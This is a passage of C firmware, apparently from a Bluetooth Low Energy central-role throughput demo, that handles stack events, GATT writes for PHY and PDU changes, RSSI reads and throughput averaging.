ATT_MTU_SIZE);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_taskFxn\n *\n * @brief Application task entry point for the Simple BLE Central.\n *\n * @param none\n *\n * @return events not processed\n */\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLECentral_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBC_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n // Process inter-task message\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg);\n }\n\n if (pMsg)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message\n if (events & SBC_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbcEvt_t *pMsg = (sbcEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message\n SimpleBLECentral_processAppMsg(pMsg);\n\n // Free the space from the message\n ICall_free(pMsg);\n }\n }\n }\n\n // Start Discovery Event\n if (events & SBC_START_DISCOVERY_EVT)\n {\n SimpleBLECentral_startDiscovery();\n }\n\n // Speed AVG Measure Event\n if (events & SBC_MEASURE_AVG_SPEED_EVT)\n {\n // local vars\n uint32_t bitsReceived = 0;\n int i;\n\n // Determine Average from Circular Buffer\n if(cbBufferFilled)\n {\n // Average using Total Buffer Size\n for(i = 0; i < CB_SIZE; i++){\n bitsReceived += bytesRecvd_cb[i];\n }\n bitsReceived = bitsReceived/CB_SIZE;\n }\n else\n {\n // Average using Running Buffer Size (prior to buffer being filled)\n for(i = 0; i <= bytesRecvd_cb_index; i++){\n bitsReceived += bytesRecvd_cb[i];\n }\n bitsReceived = bitsReceived/(bytesRecvd_cb_index+1);\n }\n // Convert to bits\n bitsReceived = 8*bitsReceived;\n\n // Display Throughput\n Display_print3(dispHandle, SBC_ROW_AVG_THROUGHPUT, 0, \"Average Rate (kb/s): %d.%d over %d Samples\",\n (bitsReceived/1000),(bitsReceived % 1000), CB_SIZE);\n\n averageRate = (bitsReceived/1000);\n }\n\n // Toggle Throughput Event\n // Peripheral Supports Throughput - so throughput should\n // begin to be measured\n if (events & SBC_TOGGLE_THROUGHPUT_EVT)\n {\n // Variables Needed for Write\n attWriteReq_t writeReq;\n uint8_t temp = 1;\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN, NULL);\n memcpy(writeReq.pValue, &temp, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n Event_post(syncEvent, SBC_TOGGLE_THROUGHPUT_EVT);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should begin doing throughput soon\n\n // Force the initial PDU size to be 27\n // Note: All connections are formed on 1M PHY\n SimpleBLECentral_doSetDLEPDU(0);\n\n // Enable 
Throughput Data Collection\n Util_startClock(&speedClock);\n }\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processStackMsg\n *\n * @brief Process an incoming task message.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg)\n{\n switch (pMsg->event)\n {\n case GAP_MSG_EVENT:\n SimpleBLECentral_processRoleEvent((gapCentralRoleEvent_t *)pMsg);\n break;\n\n case GATT_MSG_EVENT:\n SimpleBLECentral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n SimpleBLECentral_processCmdCompleteEvt((hciEvt_CmdComplete_t *)pMsg);\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n case HCI_LE_EVENT_CODE:\n {\n hciEvt_BLEPhyUpdateComplete_t *pPUC\n = (hciEvt_BLEPhyUpdateComplete_t*) pMsg;\n\n if (pPUC->BLEEventCode == HCI_BLE_PHY_UPDATE_COMPLETE_EVENT)\n {\n if (pPUC->status != SUCCESS)\n {\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Change failure\");\n }\n else\n {\n // Inform User that the PHY was Updated, and which PHY is\n // the PHY being used for the connection\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Update Complete\");\n\n // Figure out which PHY is being used\n uint8_t temp = 0;\n switch(pPUC->txPhy)\n {\n case HCI_PHY_1_MBPS:\n temp = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n temp = 1;\n break;\n\n case HCI_PHY_CODED:\n temp = 4;\n break;\n }\n\n // If phyConfirm is false, that means we initiated the change\n // if that is the case, then we can use detailed information\n // for coded PHY - use phyIndex instead\n if( phyConfirm == false)\n {\n // This means that the phyIndex was assigned by us.\n // Confirm the value\n\n // Critical Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Confirm the change to the phyIndex\n phyConfirm = true;\n }\n Hwi_restore(key);\n }\n else\n {\n // the peer device requested the change to PHY\n // update phyIndex accordingly and display the value\n phyIndex = temp;\n }\n\n currentPHY1M = 0;\n currentPHY2M = 0;\n\n if(phyIndex == 0)\n currentPHY1M = 1;\n if(phyIndex == 1)\n currentPHY2M = 1;\n\n // Tell the user which PHY we're now using\n Display_print1(dispHandle, SBC_ROW_PHY, 0, \"Current PHY: %s\", phyName[phyIndex]);\n\n }\n }\n if(pPUC->BLEEventCode == HCI_BLE_DATA_LENGTH_CHANGE_EVENT)\n {\n hciEvt_BLEDataLengthChange_t *dleEvt = (hciEvt_BLEDataLengthChange_t *)pMsg;\n Display_print1(dispHandle, SBC_ROW_PDU, 0, \"Device RX PDU Size: %dB\", dleEvt->maxRxOctets);\n\n\t\t\t\t// GUI Composer\n currentPeerTxPDUSize = dleEvt->maxRxOctets;\n }\n }\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processAppMsg\n *\n * @brief Central application event processing function.\n *\n * @param pMsg - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n case SBC_STATE_CHANGE_EVT:\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg->pData);\n\n // Free the stack message\n ICall_freeMsg(pMsg->pData);\n break;\n\n case SBC_KEY_CHANGE_EVT:\n SimpleBLECentral_handleKeys(0, pMsg->hdr.state);\n break;\n\n case SBC_RSSI_READ_EVT:\n {\n readRssi_t 
*pRssi = (readRssi_t *)pMsg->pData;\n\n // If link is up and RSSI reads active\n if (pRssi->connHandle != GAP_CONNHANDLE_ALL &&\n linkDB_Up(pRssi->connHandle))\n {\n // Restart timer\n Util_restartClock(pRssi->pClock, pRssi->period);\n\n // Read RSSI\n VOID HCI_ReadRssiCmd(pRssi->connHandle);\n }\n }\n break;\n\n case SBC_PDU_UPDATE_EVT:\n {\n // When Changing PDU Size, throughput is momentarily stopped on the peripheral\n // side for the application to process the change.\n // During this time the throughput will not reflect the correct value\n\n // Attempt to send PDU update via GATT Write\n // Variables Needed for GATT Write\n attWriteReq_t writeReq;\n uint8_t pduSize = (uint8_t) *(pMsg->pData); // Cast down to uint8_t\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &pduSize, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PDU size yet\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should begin doing throughput soon\n\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change TX PDU Size to %dB\", pduSize);\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n case SBC_PHY_UPDATE_EVT:\n {\n // When Changing PHY, throughput is stopped on the peripheral\n // side for the application to process the change.\n // During this time the throughput will not reflect the correct value\n\n // Attempt to send PHY update via GATT Write\n // Variables Needed for GATT Write\n attWriteReq_t writeReq;\n\n // Critical Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Assign the PHY index - so we can keep track of PHY,\n // more importantly, coded phy and which symbol rate is being used\n phyIndex = (uint8_t) *(pMsg->pData);\n // reset confirm, indicating that it's not the PHY being used in the\n // connection yet.\n phyConfirm = false;\n }\n Hwi_restore(key);\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PHY].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &phyIndex, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PHY change yet\n 
SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should begin doing throughput soon\n\n // Inform user that a Request was sent to update peer's PHY\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change PHY to %s\", phyName[phyIndex]);\n\n // Note if we're already using coded PHY, switching between S2 and S8\n // won't produce a PHY change event.\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n case SBC_MEASURE_INST_SPEED_EVT:\n {\n uint32_t* temp = (uint32_t*)(pMsg->pData);\n\n // Note at this point, Bytes have been recorded\n uint32_t bitsReceived = *temp;\n\n // Convert Bytes to bits\n bitsReceived = 8*bitsReceived;\n\n // Display Throughput\n Display_print2(dispHandle, SBC_ROW_INST_THROUGHPUT, 0, \"Instant Rate (kb/s): %d.%d\",\n (bitsReceived/1000),(bitsReceived % 1000));\n\n // GUI Composer\n instantRate = (bitsReceived/1000);\n }\n break;\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processRoleEvent\n *\n * @brief Central role event processing function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent)\n{\n switch (pEvent->gap.opcode)\n {\n case GAP_DEVICE_INIT_DONE_EVENT:\n {\n maxPduSize = pEvent->initDone.dataPktLen;\n\n Display_print1(dispHandle, SBC_ROW_BDADDR, 0, \"This Device's BDADDR : %s\", Util_convertBdAddr2Str(pEvent->initDone.devAddr));\n Display_print0(dispHandle, SBC_ROW_ROLESTATE, 0, \"Device GAP Role: Central\");\n }\n break;\n\n case GAP_DEVICE_INFO_EVENT:\n {\n /*\n * Device Filtering can be done here for UUID or advertisement\n * Data if desired.\n *\n * We populate the devList with both the scan response data and\n * advertisement data of each device discovered\n */\n SimpleBLECentral_addDeviceInfo(pEvent->deviceInfo.addr,\n pEvent->deviceInfo.addrType,\n pEvent->deviceInfo.eventType,\n pEvent->deviceInfo.dataLen,\n pEvent->deviceInfo.pEvtData);\n }\n break;\n\n case GAP_DEVICE_DISCOVERY_EVENT:\n {\n // Initialize scan index.\n scanIdx = -1;\n\n /*\n * Note that pEvent->discCmpl contains a list of device records (NOT scan response data)\n * Scan Response Data is contained in the GAP_DEVICE_INFO_EVENT during Scanning\n * We're verifying that we got the right number of device info responses\n * If you don't care about device response data, you could just use\n * the data from the GAP_DEVICE_DISCOVERY_EVENT as your scan results list\n * as shown in the commented code below\n *\n * If we're not filtering on UUID then we should have gotten ALL of the\n * possible devices scanned in our device list.\n */\n //scanRes = pEvent->discCmpl.numDevs;\n //memcpy(devList, pEvent->discCmpl.pDevList,\n // (sizeof(gapDevRec_t) * scanRes));\n\n // Verify that we got the right number of results\n if( scanRes != pEvent->discCmpl.numDevs )\n {\n // Something went wrong and we missed a device\n // Clear Device List and Prompt a Rescan\n SBC_ClearDeviceList();\n }\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"%d Devices Found\", scanRes);\n\n if (scanRes > 0)\n {\n // Re-enable all Menu Functions\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_NONE);\n\n // Display the first scan Result\n SBC_NextDevice();\n }\n else\n {\n // No Results, re-enable scanning only\n 
tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n }\n break;\n\n case GAP_LINK_ESTABLISHED_EVENT:\n {\n if (pEvent->gap.hdr.status == SUCCESS)\n {\n state = BLE_STATE_CONNECTED;\n connHandle = pEvent->linkCmpl.connectionHandle;\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Disable Scan Connect Menu, enable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_ALL, TBM_ITEM_0);\n\n // Forget about the Scan Results\n SBC_ClearDeviceList();\n\n // If service discovery not performed initiate service discovery\n Util_startClock(&startDiscClock);\n\n // Update Display\n Display_print1(dispHandle, SBC_ROW_PEER_DEVICE, 0, \"Peer Device : %s\", Util_convertBdAddr2Str(pEvent->linkCmpl.devAddr));\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Connected, Exchanging MTU\");\n Display_print0(dispHandle, SBC_ROW_PHY, 0, \"PHY: 1 Mbps\");\n\n // Start RSSI collection\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n\n // TODO: Remember scan Results and re enable menu\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->gap.hdr.status);\n }\n }\n break;\n\n case GAP_LINK_TERMINATED_EVENT:\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n scanIdx = -1;\n\n // Cancel RSSI reads\n SimpleBLECentral_CancelRssi(pEvent->linkTerminate.connectionHandle);\n\n // Throughput as well, if enabled\n Util_stopClock(&speedClock);\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->linkTerminate.reason);\n Display_clearLine(dispHandle, SBC_ROW_PEER_DEVICE);\n Display_clearLine(dispHandle, SBC_ROW_PHY);\n Display_clearLine(dispHandle, SBC_ROW_INST_THROUGHPUT);\n Display_clearLine(dispHandle, SBC_ROW_AVG_THROUGHPUT);\n Display_clearLine(dispHandle, SBC_ROW_RSSI);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Enable Scan Connect Menu, Disable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n break;\n\n case GAP_LINK_PARAM_UPDATE_EVENT:\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Param Update: %d\", pEvent->linkUpdate.status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. Valid entries:\n * HAL_KEY_SW_2\n * HAL_KEY_SW_1\n *\n * @return none\n */\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys)\n{\n if (keys & KEY_LEFT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON0) == 0)\n {\n tbm_buttonLeft();\n }\n }\n\n if (keys & KEY_RIGHT)\n {\n // Check if the key is still pressed. 
WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON1) == 0)\n {\n tbm_buttonRight();\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. Drop it for now.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"ATT Rsp dropped %d\", pMsg->method);\n }\n else if ((pMsg->method == ATT_READ_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_READ_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful read, display the read value\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read rsp: %d\", pMsg->msg.readRsp.pValue[0]);\n }\n }\n else if ((pMsg->method == ATT_WRITE_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n //Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"GATT Write Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful write, display the value that was written and\n // increment value\n // Display_print0(dispHandle, SBC_ROW_GATT_RESULT, 0, \"GATT Write Sent to Peer\");\n }\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. 
All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI)\n {\n // Critical Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n bytesRecvd += pMsg->msg.handleValueNoti.len;\n }\n Hwi_restore(key);\n }\n else if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n // MTU size updated\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"MTU Exchanged\");\n Display_print1(dispHandle, SBC_ROW_MTU, 0, \"MTU Size: %dB\", pMsg->msg.mtuEvt.MTU);\n\n\t // GUI Composer\n currentMTUSize = pMsg->msg.mtuEvt.MTU;\n }\n else if (discState != BLE_DISC_STATE_IDLE)\n {\n SimpleBLECentral_processGATTDiscEvent(pMsg);\n }\n } // else - in case a GATT message came after a connection has dropped, ignore it.\n\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processCmdCompleteEvt\n *\n * @brief Process an incoming OSAL HCI Command Complete Event.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg)\n{\n switch (pMsg->cmdOpcode)\n {\n case HCI_READ_RSSI:\n {\n int8 rssi = (int8)pMsg->pReturnParam[3];\n\n Display_print1(dispHandle, SBC_ROW_RSSI, 0, \"RSSI -dBm: %d\", (uint32_t)(-rssi));\n }\n break;\n\n case HCI_LE_READ_MAX_DATA_LENGTH:\n {\n\n // Define a structure for the returned parameter structure\n // Parameters expected to be returned can be found in the Core Specification\n typedef struct{\n uint8_t status;\n uint8_t maxTxBytes[2];\n uint8_t maxTxTime[2];\n uint8_t maxRxBytes[2];\n uint8_t maxRxTime[2];\n } HCI_Read_Max_Data_Length_Event_t;\n\n HCI_Read_Max_Data_Length_Event_t* temp = (HCI_Read_Max_Data_Length_Event_t*) pMsg->pReturnParam;\n\n // All returned values will be byte reversed - reverse them back for accurate values\n // Here we only care about the RX Bytes, and update the screen with them\n uint16_t ourRxPDUsize = 0;\n ourRxPDUsize = BUILD_UINT16(temp->maxRxBytes[0], temp->maxRxBytes[1]);\n\n // Inform the user what the current PDU size for receiving is\n Display_print1(dispHandle, SBC_ROW_PDU, 0, \"Device RX PDU Size: %dB\", ourRxPDUsize);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_StartRssi\n *\n * @brief Start periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n * @param period - RSSI read period in ms\n *\n * @return SUCCESS: RSSI reads started\n * bleIncorrectMode: No link\n * bleNoResources: No resources\n */\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period)\n{\n readRssi_t *pRssi;\n\n // Verify link is up\n if (!linkDB_Up(connHandle))\n {\n return bleIncorrectMode;\n }\n\n // If already allocated\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n pRssi->period = period;\n }\n // Allocate structure\n else if ((pRssi = SimpleBLECentral_RssiAlloc(connHandle)) != NULL)\n {\n pRssi->period = period;\n }\n // Allocate failed\n else\n {\n return bleNoResources;\n }\n\n // Start timer\n 
Util_restartClock(pRssi->pClock, period);\n\n return SUCCESS;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_CancelRssi\n *\n * @brief Cancel periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n *\n * @return SUCCESS: Operation successful\n * bleIncorrectMode: No link\n */\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle)\n{\n readRssi_t *pRssi;\n\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n // Free RSSI structure\n SimpleBLECentral_RssiFree(connHandle);\n\n return SUCCESS;\n }\n\n // Not found\n return bleIncorrectMode;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiAlloc\n *\n * @brief Allocate an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if allocation failed.\n */\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == GAP_CONNHANDLE_ALL)\n {\n readRssi_t *pRssi = &readRssi[i];\n\n pRssi->pClock = (Clock_Struct *)ICall_malloc(sizeof(Clock_Struct));\n if (pRssi->pClock)\n {\n Util_constructClock(pRssi->pClock, SimpleBLECentral_readRssiHandler,\n 0, 0, false, i);\n pRssi->connHandle = connHandle;\n\n return pRssi;\n }\n }\n }\n\n // No free structure found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFind\n *\n * @brief Find an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if not found.\n */\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n return &readRssi[i];\n }\n }\n\n // Not found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFree\n *\n * @brief Free an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return none\n */\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n readRssi_t *pRssi = &readRssi[i];\n if (pRssi->pClock)\n {\n Clock_destruct(pRssi->pClock);\n\n // Free clock struct\n ICall_free(pRssi->pClock);\n pRssi->pClock = NULL;\n }\n\n pRssi->connHandle = GAP_CONNHANDLE_ALL;\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscovery\n *\n * @brief Start service discovery.\n *\n * @return none\n */\nstatic void SimpleBLECentral_startDiscovery(void)\n{\n attExchangeMTUReq_t req;\n\n // Initialize cached handles\n svcStartHdl = svcEndHdl = 0;\n\n // Free up memory for Characteristic handles\n if( throughputHandles )\n {\n ICall_free(throughputHandles);\n }\n\n // Prep the State Machine for MTU Exchange\n discState = BLE_DISC_STATE_MTU;\n\n // Discover GATT Server's Rx MTU size\n req.clientRxMTU = maxPduSize - L2CAP_HDR_SIZE;\n\n // ATT MTU size should be set to the minimum of the Client Rx MTU\n // and Server Rx MTU values\n VOID GATT_ExchangeMTU(connHandle, &req, 
selfEntity);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTDiscEvent\n *\n * @brief Process GATT discovery event\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg)\n{\n if (discState == BLE_DISC_STATE_MTU)\n {\n // MTU size response received, discover simple BLE service\n if (pMsg->method == ATT_EXCHANGE_MTU_RSP)\n {\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID) };\n\n // Prep the State Machine for Service Discovery\n // (the Discovery State Machine will get the service start/stop handles)\n discState = BLE_DISC_STATE_SVC;\n\n // Discover the throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n }\n else if (discState == BLE_DISC_STATE_SVC)\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n // If procedure complete\n if (((pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP) &&\n (pMsg->hdr.status == bleProcedureComplete)) ||\n (pMsg->method == ATT_ERROR_RSP))\n {\n if (svcStartHdl != 0)\n {\n // The Throughput Service Exists!\n // At this point svcStartHdl and svcEndHdl are valid\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n }\n else if (discState == BLE_DISC_STATE_CHAR)\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n throughputHandles = ICall_malloc(sizeof(throughputProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indicated in the length field is due to\n // Header information the stack uses.\n int i = 0;\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n throughputProfileHdl_t* temp = 